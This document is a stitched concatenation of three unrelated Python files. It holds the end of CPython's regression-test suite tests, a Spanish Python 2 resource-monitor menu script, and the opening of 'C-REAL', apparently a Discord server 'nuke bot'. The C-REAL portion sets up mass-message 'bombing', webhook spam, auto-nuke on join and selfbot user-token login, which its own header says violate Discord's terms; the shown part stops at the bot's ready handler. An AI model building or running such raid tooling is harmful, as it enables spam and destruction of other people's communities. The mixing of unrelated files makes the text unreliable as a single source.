*self.regrtest_args, *self.tests]
self.run_tests(args)
def test_script_autotest(self):
# Lib/test/autotest.py
script = os.path.join(self.testdir, 'autotest.py')
args = [*self.python_args, script, *self.regrtest_args, *self.tests]
self.run_tests(args)
@unittest.skipUnless(sysconfig.is_python_build(),
'run_tests.py script is not installed')
def test_tools_script_run_tests(self):
# Tools/scripts/run_tests.py
script = os.path.join(ROOT_DIR, 'Tools', 'scripts', 'run_tests.py')
args = [script, *self.regrtest_args, *self.tests]
self.run_tests(args)
def run_batch(self, *args):
proc = self.run_command(args)
self.check_output(proc.stdout)
@unittest.skipUnless(sysconfig.is_python_build(),
'test.bat script is not installed')
@unittest.skipUnless(sys.platform == 'win32', 'Windows only')
def test_tools_buildbot_test(self):
# Tools\buildbot\test.bat
script = os.path.join(ROOT_DIR, 'Tools', 'buildbot', 'test.bat')
test_args = ['--testdir=%s' % self.tmptestdir]
if platform.machine() == 'ARM64':
test_args.append('-arm64') # ARM 64-bit build
elif platform.machine() == 'ARM':
test_args.append('-arm32') # 32-bit ARM build
elif platform.architecture()[0] == '64bit':
test_args.append('-x64') # 64-bit build
if not support.Py_DEBUG:
test_args.append('+d') # Release build, use python.exe
self.run_batch(script, *test_args, *self.tests)
@unittest.skipUnless(sys.platform == 'win32', 'Windows only')
def test_pcbuild_rt(self):
# PCbuild\rt.bat
script = os.path.join(ROOT_DIR, r'PCbuild\rt.bat')
if not os.path.isfile(script):
self.skipTest(f'File "{script}" does not exist')
rt_args = ["-q"] # Quick, don't run tests twice
if platform.machine() == 'ARM64':
rt_args.append('-arm64') # ARM 64-bit build
elif platform.machine() == 'ARM':
rt_args.append('-arm32') # 32-bit ARM build
elif platform.architecture()[0] == '64bit':
rt_args.append('-x64') # 64-bit build
if support.Py_DEBUG:
rt_args.append('-d') # Debug build, use python_d.exe
self.run_batch(script, *rt_args, *self.regrtest_args, *self.tests)
class ArgsTestCase(BaseTestCase):
"""
Test arguments of the Python test suite.
"""
def run_tests(self, *testargs, **kw):
cmdargs = ['-m', 'test', '--testdir=%s' % self.tmptestdir, *testargs]
return self.run_python(cmdargs, **kw)
def test_failing_test(self):
# test a failing test
code = textwrap.dedent("""
import unittest
class FailingTest(unittest.TestCase):
def test_failing(self):
self.fail("bug")
""")
test_ok = self.create_test('ok')
test_failing = self.create_test('failing', code=code)
tests = [test_ok, test_failing]
output = self.run_tests(*tests, exitcode=2)
self.check_executed_tests(output, tests, failed=test_failing)
def test_resources(self):
# test -u command line option
tests = {}
for resource in ('audio', 'network'):
code = textwrap.dedent("""
from test import support; support.requires(%r)
import unittest
class PassingTest(unittest.TestCase):
def test_pass(self):
pass
""" % resource)
tests[resource] = self.create_test(resource, code)
test_names = sorted(tests.values())
# -u all: 2 resources enabled
output = self.run_tests('-u', 'all', *test_names)
self.check_executed_tests(output, test_names)
# -u audio: 1 resource enabled
output = self.run_tests('-uaudio', *test_names)
self.check_executed_tests(output, test_names,
skipped=tests['network'])
# no option: 0 resources enabled
output = self.run_tests(*test_names)
self.check_executed_tests(output, test_names,
skipped=test_names)
def test_random(self):
# test -r and --randseed command line option
code = textwrap.dedent("""
import random
print("TESTRANDOM: %s" % random.randint(1, 1000))
""")
test = self.create_test('random', code)
# first run to get the output with the random seed
output = self.run_tests('-r', test)
randseed = self.parse_random_seed(output)
match = self.regex_search(r'TESTRANDOM: ([0-9]+)', output)
test_random = int(match.group(1))
# try to reproduce with the random seed
output = self.run_tests('-r', '--randseed=%s' % randseed, test)
randseed2 = self.parse_random_seed(output)
self.assertEqual(randseed2, randseed)
match = self.regex_search(r'TESTRANDOM: ([0-9]+)', output)
test_random2 = int(match.group(1))
self.assertEqual(test_random2, test_random)
def test_fromfile(self):
# test --fromfile
tests = [self.create_test() for index in range(5)]
# Write the list of files using a format similar to regrtest output:
# [1/2] test_1
# [2/2] test_2
filename = os_helper.TESTFN
self.addCleanup(os_helper.unlink, filename)
# test format '0:00:00 [2/7] test_opcodes -- test_grammar took 0 sec'
with open(filename, "w") as fp:
previous = None
for index, name in enumerate(tests, 1):
line = ("00:00:%02i [%s/%s] %s"
% (index, index, len(tests), name))
if previous:
line += " -- %s took 0 sec" % previous
print(line, file=fp)
previous = name
output = self.run_tests('--fromfile', filename)
self.check_executed_tests(output, tests)
# test format '[2/7] test_opcodes'
with open(filename, "w") as fp:
for index, name in enumerate(tests, 1):
print("[%s/%s] %s" % (index, len(tests), name), file=fp)
output = self.run_tests('--fromfile', filename)
self.check_executed_tests(output, tests)
# test format 'test_opcodes'
with open(filename, "w") as fp:
for name in tests:
print(name, file=fp)
output = self.run_tests('--fromfile', filename)
self.check_executed_tests(output, tests)
# test format 'Lib/test/test_opcodes.py'
with open(filename, "w") as fp:
for name in tests:
print('Lib/test/%s.py' % name, file=fp)
output = self.run_tests('--fromfile', filename)
self.check_executed_tests(output, tests)
def test_interrupted(self):
code = TEST_INTERRUPTED
test = self.create_test('sigint', code=code)
output = self.run_tests(test, exitcode=130)
self.check_executed_tests(output, test, omitted=test,
interrupted=True)
def test_slowest(self):
# test --slowest
tests = [self.create_test() for index in range(3)]
output = self.run_tests("--slowest", *tests)
self.check_executed_tests(output, tests)
regex = ('10 slowest tests:\n'
'(?:- %s: .*\n){%s}'
% (self.TESTNAME_REGEX, len(tests)))
self.check_line(output, regex)
def test_slowest_interrupted(self):
# Issue #25373: test --slowest with an interrupted test
code = TEST_INTERRUPTED
test = self.create_test("sigint", code=code)
for multiprocessing in (False, True):
with self.subTest(multiprocessing=multiprocessing):
if multiprocessing:
args = ("--slowest", "-j2", test)
else:
args = ("--slowest", test)
output = self.run_tests(*args, exitcode=130)
self.check_executed_tests(output, test,
omitted=test, interrupted=True)
regex = ('10 slowest tests:\n')
self.check_line(output, regex)
def test_coverage(self):
# test --coverage
test = self.create_test('coverage')
output = self.run_tests("--coverage", test)
self.check_executed_tests(output, [test])
regex = (r'lines +cov% +module +\(path\)\n'
r'(?: *[0-9]+ *[0-9]{1,2}% *[^ ]+ +\([^)]+\)+)+')
self.check_line(output, regex)
def test_wait(self):
# test --wait
test = self.create_test('wait')
output = self.run_tests("--wait", test, input='key')
self.check_line(output, 'Press any key to continue')
def test_forever(self):
# test --forever
code = textwrap.dedent("""
import builtins
import unittest
class ForeverTester(unittest.TestCase):
def test_run(self):
# Store the state in the builtins module, because the test
# module is reloaded at each run
if 'RUN' in builtins.__dict__:
builtins.__dict__['RUN'] += 1
if builtins.__dict__['RUN'] >= 3:
self.fail("fail at the 3rd runs")
else:
builtins.__dict__['RUN'] = 1
""")
test = self.create_test('forever', code=code)
output = self.run_tests('--forever', test, exitcode=2)
self.check_executed_tests(output, [test]*3, failed=test)
def check_leak(self, code, what):
test = self.create_test('huntrleaks', code=code)
filename = 'reflog.txt'
self.addCleanup(os_helper.unlink, filename)
output = self.run_tests('--huntrleaks', '3:3:', test,
exitcode=2,
stderr=subprocess.STDOUT)
self.check_executed_tests(output, [test], failed=test)
line = 'beginning 6 repetitions\n123456\n......\n'
self.check_line(output, re.escape(line))
line2 = '%s leaked [1, 1, 1] %s, sum=3\n' % (test, what)
self.assertIn(line2, output)
with open(filename) as fp:
reflog = fp.read()
self.assertIn(line2, reflog)
@unittest.skipUnless(support.Py_DEBUG, 'need a debug build')
def test_huntrleaks(self):
# test --huntrleaks
code = textwrap.dedent("""
import unittest
GLOBAL_LIST = []
class RefLeakTest(unittest.TestCase):
def test_leak(self):
GLOBAL_LIST.append(object())
""")
self.check_leak(code, 'references')
@unittest.skipUnless(support.Py_DEBUG, 'need a debug build')
def test_huntrleaks_fd_leak(self):
# test --huntrleaks for file descriptor leak
code = textwrap.dedent("""
import os
import unittest
class FDLeakTest(unittest.TestCase):
def test_leak(self):
fd = os.open(__file__, os.O_RDONLY)
# bug: never close the file descriptor
""")
self.check_leak(code, 'file descriptors')
def test_list_tests(self):
# test --list-tests
tests = [self.create_test() for i in range(5)]
output = self.run_tests('--list-tests', *tests)
self.assertEqual(output.rstrip().splitlines(),
tests)
def test_list_cases(self):
# test --list-cases
code = textwrap.dedent("""
import unittest
class Tests(unittest.TestCase):
def test_method1(self):
pass
def test_method2(self):
pass
""")
testname = self.create_test(code=code)
# Test --list-cases
all_methods = ['%s.Tests.test_method1' % testname,
'%s.Tests.test_method2' % testname]
output = self.run_tests('--list-cases', testname)
self.assertEqual(output.splitlines(), all_methods)
# Test --list-cases with --match
all_methods = ['%s.Tests.test_method1' % testname]
output = self.run_tests('--list-cases',
'-m', 'test_method1',
testname)
self.assertEqual(output.splitlines(), all_methods)
@support.cpython_only
def test_crashed(self):
# Any code which causes a crash
code = 'import faulthandler; faulthandler._sigsegv()'
crash_test = self.create_test(name="crash", code=code)
tests = [crash_test]
output = self.run_tests("-j2", *tests, exitcode=2)
self.check_executed_tests(output, tests, failed=crash_test,
randomize=True)
def parse_methods(self, output):
regex = re.compile("^(test[^ ]+).*ok$", flags=re.MULTILINE)
return [match.group(1) for match in regex.finditer(output)]
def test_ignorefile(self):
code = textwrap.dedent("""
import unittest
class Tests(unittest.TestCase):
def test_method1(self):
pass
def test_method2(self):
pass
def test_method3(self):
pass
def test_method4(self):
pass
""")
all_methods = ['test_method1', 'test_method2',
'test_method3', 'test_method4']
testname = self.create_test(code=code)
# only run a subset
filename = os_helper.TESTFN
self.addCleanup(os_helper.unlink, filename)
subset = [
# only ignore the method name
'test_method1',
# ignore the full identifier
'%s.Tests.test_method3' % testname]
with open(filename, "w") as fp:
for name in subset:
print(name, file=fp)
output = self.run_tests("-v", "--ignorefile", filename, testname)
methods = self.parse_methods(output)
subset = ['test_method2', 'test_method4']
self.assertEqual(methods, subset)
def test_matchfile(self):
code = textwrap.dedent("""
import unittest
class Tests(unittest.TestCase):
def test_method1(self):
pass
def test_method2(self):
pass
def test_method3(self):
pass
def test_method4(self):
pass
""")
all_methods = ['test_method1', 'test_method2',
'test_method3', 'test_method4']
testname = self.create_test(code=code)
# by default, all methods should be run
output = self.run_tests("-v", testname)
methods = self.parse_methods(output)
self.assertEqual(methods, all_methods)
# only run a subset
filename = os_helper.TESTFN
self.addCleanup(os_helper.unlink, filename)
subset = [
# only match the method name
'test_method1',
# match the full identifier
'%s.Tests.test_method3' % testname]
with open(filename, "w") as fp:
for name in subset:
print(name, file=fp)
output = self.run_tests("-v", "--matchfile", filename, testname)
methods = self.parse_methods(output)
subset = ['test_method1', 'test_method3']
self.assertEqual(methods, subset)
def test_env_changed(self):
code = textwrap.dedent("""
import unittest
class Tests(unittest.TestCase):
def test_env_changed(self):
open("env_changed", "w").close()
""")
testname = self.create_test(code=code)
# don't fail by default
output = self.run_tests(testname)
self.check_executed_tests(output, [testname], env_changed=testname)
# fail with --fail-env-changed
output = self.run_tests("--fail-env-changed", testname, exitcode=3)
self.check_executed_tests(output, [testname], env_changed=testname,
fail_env_changed=True)
def test_rerun_fail(self):
# FAILURE then FAILURE
code = textwrap.dedent("""
import unittest
class Tests(unittest.TestCase):
def test_succeed(self):
return
def test_fail_always(self):
# test that always fails
self.fail("bug")
""")
testname = self.create_test(code=code)
output = self.run_tests("-w", testname, exitcode=2)
self.check_executed_tests(output, [testname],
failed=testname, rerun={testname: "test_fail_always"})
def test_rerun_success(self):
# FAILURE then SUCCESS
code = textwrap.dedent("""
import builtins
import unittest
class Tests(unittest.TestCase):
def test_succeed(self):
return
def test_fail_once(self):
if not hasattr(builtins, '_test_failed'):
builtins._test_failed = True
self.fail("bug")
""")
testname = self.create_test(code=code)
output = self.run_tests("-w", testname, exitcode=0)
self.check_executed_tests(output, [testname],
rerun={testname: "test_fail_once"})
def test_no_tests_ran(self):
code = textwrap.dedent("""
import unittest
class Tests(unittest.TestCase):
def test_bug(self):
pass
""")
testname = self.create_test(code=code)
output = self.run_tests(testname, "-m", "nosuchtest", exitcode=0)
self.check_executed_tests(output, [testname], no_test_ran=testname)
def test_no_tests_ran_skip(self):
code = textwrap.dedent("""
import unittest
class Tests(unittest.TestCase):
def test_skipped(self):
self.skipTest("because")
""")
testname = self.create_test(code=code)
output = self.run_tests(testname, exitcode=0)
self.check_executed_tests(output, [testname])
def test_no_tests_ran_multiple_tests_nonexistent(self):
code = textwrap.dedent("""
import unittest
class Tests(unittest.TestCase):
def test_bug(self):
pass
""")
testname = self.create_test(code=code)
testname2 = self.create_test(code=code)
output = self.run_tests(testname, testname2, "-m", "nosuchtest", exitcode=0)
self.check_executed_tests(output, [testname, testname2],
no_test_ran=[testname, testname2])
def test_no_test_ran_some_test_exist_some_not(self):
code = textwrap.dedent("""
import unittest
class Tests(unittest.TestCase):
def test_bug(self):
pass
""")
testname = self.create_test(code=code)
other_code = textwrap.dedent("""
import unittest
class Tests(unittest.TestCase):
def test_other_bug(self):
pass
""")
testname2 = self.create_test(code=other_code)
output = self.run_tests(testname, testname2, "-m", "nosuchtest",
"-m", "test_other_bug", exitcode=0)
self.check_executed_tests(output, [testname, testname2],
no_test_ran=[testname])
@support.cpython_only
def test_uncollectable(self):
code = textwrap.dedent(r"""
import _testcapi
import gc
import unittest
@_testcapi.with_tp_del
class Garbage:
def __tp_del__(self):
pass
class Tests(unittest.TestCase):
def test_garbage(self):
# create an uncollectable object
obj = Garbage()
obj.ref_cycle = obj
obj = None
""")
testname = self.create_test(code=code)
output = self.run_tests("--fail-env-changed", testname, exitcode=3)
self.check_executed_tests(output, [testname],
env_changed=[testname],
fail_env_changed=True)
def test_multiprocessing_timeout(self):
code = textwrap.dedent(r"""
import time
import unittest
try:
import faulthandler
except ImportError:
faulthandler = None
class Tests(unittest.TestCase):
# test hangs and so should be stopped by the timeout
def test_sleep(self):
# we want to test regrtest multiprocessing timeout,
# not faulthandler timeout
if faulthandler is not None:
faulthandler.cancel_dump_traceback_later()
time.sleep(60 * 5)
""")
testname = self.create_test(code=code)
output = self.run_tests("-j2", "--timeout=1.0", testname, exitcode=2)
self.check_executed_tests(output, [testname],
failed=testname)
self.assertRegex(output,
re.compile('%s timed out' % testname, re.MULTILINE))
def test_unraisable_exc(self):
# --fail-env-changed must catch unraisable exception.
# The exception must be displayed even if sys.stderr is redirected.
code = textwrap.dedent(r"""
import unittest
import weakref
from test.support import captured_stderr
class MyObject:
pass
def weakref_callback(obj):
raise Exception("weakref callback bug")
class Tests(unittest.TestCase):
def test_unraisable_exc(self):
obj = MyObject()
ref = weakref.ref(obj, weakref_callback)
with captured_stderr() as stderr:
# call weakref_callback() which logs
# an unraisable exception
obj = None
self.assertEqual(stderr.getvalue(), '')
""")
testname = self.create_test(code=code)
output = self.run_tests("--fail-env-changed", "-v", testname, exitcode=3)
self.check_executed_tests(output, [testname],
env_changed=[testname],
fail_env_changed=True)
self.assertIn("Warning -- Unraisable exception", output)
self.assertIn("Exception: weakref callback bug", output)
def test_threading_excepthook(self):
# --fail-env-changed must catch uncaught thread exception.
# The exception must be displayed even if sys.stderr is redirected.
code = textwrap.dedent(r"""
import threading
import unittest
from test.support import captured_stderr
class MyObject:
pass
def func_bug():
raise Exception("bug in thread")
class Tests(unittest.TestCase):
def test_threading_excepthook(self):
with captured_stderr() as stderr:
thread = threading.Thread(target=func_bug)
thread.start()
thread.join()
self.assertEqual(stderr.getvalue(), '')
""")
testname = self.create_test(code=code)
output = self.run_tests("--fail-env-changed", "-v", testname, exitcode=3)
self.check_executed_tests(output, [testname],
env_changed=[testname],
fail_env_changed=True)
self.assertIn("Warning -- Uncaught thread exception", output)
self.assertIn("Exception: bug in thread", output)
def test_print_warning(self):
# bpo-45410: The order of messages must be preserved when -W and
# support.print_warning() are used.
code = textwrap.dedent(r"""
import sys
import unittest
from test import support
class MyObject:
pass
def func_bug():
raise Exception("bug in thread")
class Tests(unittest.TestCase):
def test_print_warning(self):
print("msg1: stdout")
support.print_warning("msg2: print_warning")
# Fail with ENV CHANGED to see print_warning() log
support.environment_altered = True
""")
testname = self.create_test(code=code)
# Expect an output like:
#
# test_threading_excepthook (test.test_x.Tests) ... msg1: stdout
# Warning -- msg2: print_warning
# ok
regex = (r"test_print_warning.*msg1: stdout\n"
r"Warning -- msg2: print_warning\n"
r"ok\n")
for option in ("-v", "-W"):
with self.subTest(option=option):
cmd = ["--fail-env-changed", option, testname]
output = self.run_tests(*cmd, exitcode=3)
self.check_executed_tests(output, [testname],
env_changed=[testname],
fail_env_changed=True)
self.assertRegex(output, regex)
def test_unicode_guard_env(self):
guard = os.environ.get(setup.UNICODE_GUARD_ENV)
self.assertIsNotNone(guard, f"{setup.UNICODE_GUARD_ENV} not set")
if guard.isascii():
# Skip to signify that the env var value was changed by the user;
# possibly to something ASCII to work around Unicode issues.
self.skipTest("Modified guard")
def test_cleanup(self):
dirname = os.path.join(self.tmptestdir, "test_python_123")
os.mkdir(dirname)
filename = os.path.join(self.tmptestdir, "test_python_456")
open(filename, "wb").close()
names = [dirname, filename]
cmdargs = ['-m', 'test',
'--tempdir=%s' % self.tmptestdir,
'--cleanup']
self.run_python(cmdargs)
for name in names:
self.assertFalse(os.path.exists(name), name)
class TestUtils(unittest.TestCase):
def test_format_duration(self):
self.assertEqual(utils.format_duration(0),
'0 ms')
self.assertEqual(utils.format_duration(1e-9),
'1 ms')
self.assertEqual(utils.format_duration(10e-3),
'10 ms')
self.assertEqual(utils.format_duration(1.5),
'1.5 sec')
self.assertEqual(utils.format_duration(1),
'1.0 sec')
self.assertEqual(utils.format_duration(2 * 60),
'2 min')
self.assertEqual(utils.format_duration(2 * 60 + 1),
'2 min 1 sec')
self.assertEqual(utils.format_duration(3 * 3600),
'3 hour')
self.assertEqual(utils.format_duration(3 * 3600 + 2 * 60 + 1),
'3 hour 2 min')
self.assertEqual(utils.format_duration(3 * 3600 + 1),
'3 hour 1 sec')
if __name__ == '__main__':
unittest.main()
|
monitor3b.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
import threading
import commands
import os, sys
import time
semaforo=threading.Semaphore(0) # option threads signal completion through this semaphore
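# Handshake: Menu() blocks on semaforo.acquire() after dispatching an option,
# and each option function calls semaforo.release() when it finishes, which
# lets the menu loop continue.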
def multiProc():
os.system("clear")
print "\t\t\t Ejemplo de multiprocesamiento"
print "\nEste es solo un ejemplo de como crear multiprocesos.\n"
def worker():
print threading.currentThread().getName(), 'Started' # the thread is launched and prints its own name
time.sleep(5)
print threading.currentThread().getName(), 'Stopping'
def servicio():
print threading.currentThread().getName(), 'Started'
time.sleep(5)
print threading.currentThread().getName(), 'Stopping'
t = threading.Thread(target=servicio, name='Servicio')
w = threading.Thread(target=worker, name='Worker:')
z = threading.Thread(target=worker)
w.start()
time.sleep(3)
z.start()
time.sleep(5)
t.start()
time.sleep(30)
semaforo.release()
return 0
def Processor():
os.system("clear")
print "\t\t\t Procesador"
mod=commands.getoutput("cat /proc/cpuinfo | grep \"model name\"")
cores=commands.getoutput("cat /proc/cpuinfo | grep \"cpu cores\"")
bugs=commands.getoutput("cat /proc/cpuinfo | grep \"bugs\"")
addSize=commands.getoutput("cat /proc/cpuinfo | grep \"address sizes\"")
mhz=commands.getoutput("cat /proc/cpuinfo | grep \"cpu MHz\"")
print "Modelo de procesador:\n" + mod + "\n"
print "Nucleos:\n" + cores + "\n"
print "Vulnerabilidades:\n" + bugs + "\n"
print "Tamaño de directorios:\n" + addSize + "\n"
print "MHz del procesador:\n" + mhz + "\n"
time.sleep(30)
semaforo.release()
return 0
def vmstat():
os.system("clear")
var = commands.getoutput('vmstat -s -S M') # capture the vmstat memory report (unit: MB) in 'var'
print var #print 'var' to show the memory report
#print "\n\n\nPress ctrl+c to return to the menu\n"
time.sleep(20)
semaforo.release() # release the Menu thread so the menu is shown again
return 0
def Utime():
os.system("clear")
print " Fecha---Tiempo en uso"
tTotal = commands.getoutput('uptime -s -S M')
print tTotal
time.sleep(20)
semaforo.release() # release the Menu thread so the menu is shown again
return 0
def Interrupc():
os.system("clear")
print " Interrupciones"
inter = commands.getoutput('interrupts -s -S M')
print inter
time.sleep(20)
semaforo.release() # release the Menu thread so the menu is shown again
return 0
def Menu():
global semaforo
opt='0'
while opt != '6':
os.system("clear")
op={'1':multiProc, '2':Processor, '3':vmstat, '4':Utime, '5':Interrupc}
print "\t\t\t\t Monitor de Recursos\n\n"
print "\t1. Ejemplo de multiprocesamiento.\n"
print "\t2. Caracteristicas del procesador.\n"
print "\t3. Reporte de Memoria Virtual\n"
print "\t4. Tiempo encendido.\n"
print "\t5. Interrupciones.\n"
print "\t6. Salir\n"
opt=raw_input( "\n\t>> ")
try:
res=op[opt]()
semaforo.acquire() # block until the selected option releases the semaphore
except KeyError:
if opt != '6':
print "Invalid option"
Menu() |
c-realV2.py | #!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
MIT License
Copyright (c) 2020 - 2021
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
Don't use the bot on real servers or use it to spam: doing so breaks
Discord's ToS and can result in account deletion.
"""
# discord
import discord, sys, requests, os, time
from discord.ext import commands
import asyncio
from packaging import version
from random import randint, choice, randrange, random, choices
from threading import Thread
from inputimeout import inputimeout, TimeoutOccurred
from queue import Queue
from io import BytesIO
from pathlib import Path
from math import ceil
from copy import deepcopy
if sys.platform == 'linux':
import simplejson as json
else:
import json
# style
from colorama import init, Fore
init(autoreset=True)
#
__TITLE__ = "C-REAL"
__VERSION__ = "2.4.0"
__AUTHOR__ = "TKperson"
__LICENSE__ = "MIT"
# Global vars
per_page = 15
commands_per_page = 5
number_of_bomb_default = 250
selected_server = None
sorted_commands = []
webhook_targets = []
saved_ctx = None
nuke_on_join = False
auto_nick = False
auto_status = False
selfbot_has_perm = False
timeout = 6
fetching_members = False
bad_filename_map = dict((ord(char), None) for char in '<>:"\\/|?*')
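# Translation table for str.translate(): drops characters that are invalid
# in Windows filenames.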
grant_all_permissions = False
# normal functions==============
def exit():
try:
input('Press enter to exit...')
except (EOFError, KeyboardInterrupt):
pass
sys.exit(1)
def banner():
"""Handler for non-unicode consoles"""
sys.stdout.buffer.write(f'''\
██████╗ ██████╗ ███████╗ █████╗ ██╗
██╔════╝ ██╔══██╗██╔════╝██╔══██╗██║ Version: {__VERSION__}
██║ █████╗ ██████╔╝█████╗ ███████║██║ Made by:
██║ ╚════╝ ██╔══██╗██╔══╝ ██╔══██║██║ TKperson
╚██████╗ ██║ ██║███████╗██║ ██║███████╗ and
╚═════╝ ╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ cyxl
'''.encode('utf8'))
if version.parse('1.5.1') > version.parse(discord.__version__):
print('Please update your discord.py.')
exit()
settings = {"token":None,"permissions":[],"bot_permission":"2146958847","command_prefix":".","bot_status":"offline","verbose":15,"bomb_messages":{"random":None,"fixed":[]},"webhook_spam":{"usernames":[],"pfp_urls":[],"contents":[]},"after":[],"proxies":[],"ban_whitelist":[]}
def setUp():
# check location
from glob import glob
config = None
config_parent_dir = os.path.join(Path().absolute().__str__(), 'data')
config_path = os.path.join(config_parent_dir, 'default.json')
json_paths = glob(os.path.join(Path().absolute().__str__(), 'data', '*.json'))
def getConfig(choice, timeout):
while True:
# individual prints and a triple-quoted block perform the same; this layout just reads better
print('=========================')
print('| |')
print('| [{0}] Load default.json |'.format('1' if 1 in choice else 'x'))
print('| [{0}] Select .json file |'.format('2' if 2 in choice else 'x'))
print('| [{0}] Create a new json |'.format('3' if 3 in choice else 'x'))
print('| |')
print('=========================')
print('[x] = not Available;')
try:
response = inputimeout(prompt='Auto boot with choice [1] in %d seconds...\nChoose 1, 2, or 3\n>> ' % timeout, timeout=timeout)
except TimeoutOccurred:
response = '1'
if response == '1':
if not os.path.isfile(config_path):
print(f'Unable to find file: {config_path}')
continue
with open(config_path, 'r', encoding='utf8') as f:
try:
return json.loads(f.read())
except json.decoder.JSONDecodeError:
print(f'Errors occurred while reading the configuration file. File path -> {config_path}\nTry https://jsonlint.com/?code= to help validate it. Skipping default.json...')
break
elif response == '2':
while True:
print('=========================')
print('0) Go back')
for i, path in enumerate(json_paths):
print(f'{str(i+1)}) {path}')
index = input('Select the .json file.\n>> ')
if not index.isdigit() or not (0 <= (index := int(index)) <= len(json_paths)):
print(f'You need to enter an integer that is between or on 0 and {str(len(json_paths))}')
continue
if index == 0:
timeout = 999999
break
with open(json_paths[index-1], 'r', encoding='utf8') as f:
try:
return json.loads(f.read())
except json.decoder.JSONDecodeError:
print(f'Errors occurred while reading the configuration file. File path -> {json_paths[index-1]}\nTry https://jsonlint.com/?code= to help validate it. Skipping this file...')
elif response == '3':
break
global settings, settings_copy
if os.path.isfile(config_path): # have default.json
config = getConfig([1,2,3], 5)
elif len(json_paths) > 0: # dont have default.json but have other .json file
config = getConfig([2,3], 999999)
if config is not None:
settings.update(config)
else:
try:
# from getpass import getpass
# settings['token'] = getpass('Enter token. Note: Whatever you enter here will not be displayed.\n>> ')
settings['token'] = input('Enter token.\n>> ')
settings['permissions'].append(input('\nEnter your discord tag or user ID. The user ID is recommended because some unicode names are hard for the code to match.\n>> '))
except KeyboardInterrupt:
sys.exit(0)
except EOFError:
print('Invalid input/EOFError. This may be caused by some unicode.')
exit()
print('\nTips:')
print('The default command_prefix is: .')
print(f'Your current command_prefix is: {settings["command_prefix"]}')
print(f'Use {settings["command_prefix"]}config to config the settings and more info about how to config.\n')
print('Join our discord https://discord.gg/REMwN7s68S')
settings_copy = deepcopy(settings)
setUp()
# token, permissions, bomb_messages, webhook_spam, bot_permission, command_prefix, bot_status, verbose, after, proxies = readJson()
want_log_request = want_log_console = want_log_message = want_log_errors = 0
def updateVerbose():
global want_log_request, want_log_console, want_log_message, want_log_errors
verbose = settings['verbose']
want_log_request = verbose & 1 << 0
want_log_console = verbose & 1 << 1
want_log_message = verbose & 1 << 2
want_log_errors = verbose & 1 << 3
updateVerbose()
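# Example: the default verbose of 15 (0b1111) enables all four log channels
# above; 6 (0b0110) would enable only console and message logging.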
# def randomProxy(protocol):
# # As long it works fine then i'm using this method
# if proxies is None or len(proxies) == 0:
# return None
# return {protocol: choice(proxies)}
is_selfbot = True
headers = {}
def checkToken(token=None):
if token is None:
token = settings['token']
global is_selfbot, headers
try:
headers = {'authorization': token, 'content-type': 'application/json'}
print('Checking selfbot token.', end='\r')
if 'id' not in requests.get(url='https://discord.com/api/v8/users/@me', timeout=timeout, headers=headers).json():
# It took ages to discover that "Bot <token>" is the authorization value for bot tokens.
# Reading source code is always a good thing :)
headers['authorization'] = 'Bot ' + token
print('Checking normal bot token.', end='\r')
if 'id' not in requests.get(url='https://discord.com/api/v8/users/@me', timeout=timeout, headers=headers).json():
print('Invalid token is being used.')
exit()
else:
is_selfbot = False
# except requests.exceptions.ProxyError:
# print('Bad proxy is being used. You can try to change a proxy or restart the bot.')
# exit()
# except requests.exceptions.ConnectTimeout:
# print(f'Proxy reached maximum load time: timeout is {timeout} seconds long.')
# exit()
except requests.exceptions.ConnectionError:
print('Connect to the internet before using any Discord-related features. If you are connected and still seeing this message, try turning off your VPN/proxy/TOR node. If the problem persists, or you don\'t want to turn the VPN off, you can host the bot on a service like repl/heroku/google cloud. The source code is at https://github.com/TKperson/Nuking-Discord-Server-Bot-Nuke-Bot.')
exit()
except (requests.exceptions.InvalidHeader, json.decoder.JSONDecodeError):
print('Invalid token is being used.')
exit()
checkToken()
### check updates
print('Checking update... ', end='\r')
github_version = requests.get('https://raw.githubusercontent.com/TKperson/Nuking-Discord-Server-Bot-Nuke-Bot/master/VERSION.txt').text
if version.parse(github_version) > version.parse(__VERSION__):
print(f'New C-REAL update has been launched -> {github_version} <- :party:')
print('Loading scripts...' + ' ' * 15, end='\r')
"""
command_prefix - command prefix
case_insensitive - commands will be callable without case restrictions if this is set to true
self_bot - self_bot: :class:`bool`
If ``True``, the bot will only listen to commands invoked by itself rather
than ignoring itself. If ``False`` (the default) then the bot will ignore
itself. This cannot be changed once initialised.
intents - intents: :class:`Intents`
The intents that you want to enable for the session. This is a way of
disabling and enabling certain gateway events from triggering and being sent.
If not given, defaults to a regularly constructed :class:`Intents` class.
"""
async def determine_prefix(bot, message): # https://stackoverflow.com/questions/56796991/discord-py-changing-prefix-with-command
return settings['command_prefix']
# client = commands.Bot(command_prefix=determine_prefix, case_insensitive=True, self_bot=is_selfbot, proxies=randomProxy('http'))
client = commands.Bot(command_prefix=settings['command_prefix'], case_insensitive=True, self_bot=is_selfbot, intents=discord.Intents().all())
client.remove_command('help')
######### Events #########
@client.event
async def on_connect():
if is_selfbot:
for user in settings['permissions']:
if str(client.user.id) == user or f'{client.user.name}#{client.user.discriminator}' == user:
global selfbot_has_perm
selfbot_has_perm = True
settings['permissions'].append(str(client.user.id))
global sorted_commands
sorted_commands = sorted(client.commands, key=lambda e: e.name[0])
await changeStatus(None, settings['bot_status'])
@client.event
async def on_ready():
banner()
print('/+========================================================')
print(f'| | {Fore.GREEN}Bot ready.')
print(f'| {Fore.MAGENTA}+ Logged in as')
print(f'| | {client.user.name}#{client.user.discriminator}')
print(f'| | {client.user.id}')
